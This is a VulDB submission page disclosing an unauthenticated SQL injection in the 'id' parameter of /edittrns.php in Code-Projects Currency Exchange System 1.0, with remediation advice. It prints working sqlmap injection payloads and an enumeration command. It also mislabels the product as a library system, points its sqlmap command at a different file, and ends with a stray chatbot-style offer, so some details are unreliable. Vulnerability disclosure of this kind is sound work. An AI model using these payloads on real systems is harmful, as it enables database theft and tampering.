Submit #701154: Code-Projects Currency Exchange System 1.0 /edittrns.php SQL Injectioninfo

TitelCode-Projects Currency Exchange System 1.0 /edittrns.php SQL Injection
Beschreibung # ???? Vulnerability Report: Code-Projects Currency Exchange System V1.0 /edittrns.php SQL Injection ## ???? Summary | Detail | Content | | :--- | :--- | | **Affected Product Name** | Library System | | **Affected Version** | V1.0 | | **Vendor Homepage** | `https://code-projects.org/currency-exchange-system-in-php-with-source-code/` | | **Vulnerability Type** | SQL Injection (SQLi) | | **Affected File** | `/edittrns.php` | | **Affected Parameter** | `id` (GET) | | **Authentication Required** | None (No login or authorization required to exploit) | | **Submitter** | yudeshui | ----- ## ???? Description and Impact ### Root Cause The vulnerability resides in the file `/edittrns.php`, where the application processes user-supplied input from the **`id`** (ID) parameter. The program **directly concatenates** this parameter value into the SQL query string **without sufficient cleaning, validation, or sanitization**. ### Impact A successful attack allows an attacker to inject malicious SQL code, thereby manipulating the original database query logic. This can lead to severe consequences, including: * **Unauthorized Database Access:** Stealing sensitive data such as user information or book records. * **Data Tampering/Destruction:** Modifying, deleting, or adding records in the database. * **System Control:** In severe cases, gaining system-level control, posing a serious threat to system security and business continuity. ----- ## ????️ Vulnerability Details and PoC The vulnerability is located in the processing of the `id` parameter within a GET request. ### PoC Payload Examples The following are examples of SQL injection payloads captured during testing with the `sqlmap` tool: ``` --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 9314=9314 AND 'pVdP'='pVdP Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1' OR (SELECT 3435 FROM(SELECT COUNT(*),CONCAT(0x71626b6271,(SELECT (ELT(3435=3435,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Xysl'='Xysl Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 3654 FROM (SELECT(SLEEP(5)))MqEA) AND 'eDDr'='eDDr Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x71626b6271,0x684d47676e51547943754f46574f7a6950474c6b6e444e4249497851714454656e5250764b42684e,0x7171626a71),NULL,NULL,NULL,NULL,NULL,NULL-- - --- ``` ### Sqlmap Screenshot Example (Database Enumeration) ``` sqlmap -u "http://dede:802/viewserial.php?id=1" --batch --dbs ``` ----- <img width="1342" height="499" alt="Image" src="https://github.com/user-attachments/assets/ff15d6f4-5f9c-4d4d-a988-7a6d6bae793a" /> ## ✅ Suggested Repair Measures To completely resolve this SQL injection issue and enhance overall system security, the following defensive coding practices are strongly recommended: ### 1\. Use Prepared Statements and Parameter Binding (Primary Defense) This is the most effective method against SQL injection. Prepared statements separate the structure of the SQL command from the user-supplied data, ensuring the input is treated as a literal string value and cannot be interpreted as executable SQL code. * **Action:** Rewrite all database queries in `/edittrns.php` (and all other files) to use **Prepared Statements** (e.g., using **`mysqli_prepare()`** or **PDO** with parameter binding). ### 2\. Strict Input Validation and Filtering Strictly validate and filter all user input data to ensure it conforms to the expected format, type, and length. * **Action:** For parameters like `id` which should be numeric, use PHP functions like **`filter_var()`** or **`is_numeric()`** for strict checking. ### 3\. Minimize Database User Permissions Adhere to the Principle of Least Privilege. The database account used by the web application for daily operations should only possess the minimum necessary permissions. * **Action:** Ensure the application's database user **does not** have administrative privileges (e.g., `DROP`, `ALTER`, or file system access) to limit the impact of a successful breach. ### 4\. Regular Security Audits Establish a routine process for security code reviews and auditing to proactively identify and fix potential vulnerabilities before they are exploited. ----- Would you like me to provide a specific code example in PHP demonstrating how to use **prepared statements** to fix this vulnerability?
Quelle⚠️ https://github.com/rassec2/dbcve/issues/14
Benutzer
 yudeshui (UID 91129)
Einreichung25.11.2025 13:52 (vor 5 Monaten)
Moderieren07.12.2025 16:18 (12 days later)
StatusAkzeptiert
VulDB Eintrag334659 [code-projects Currency Exchange System 1.0 /edittrns.php ID SQL Injection]
Punkte20

ZurückÜbersichtWeiter

Do you need the next level of professionalism?

Upgrade your account now!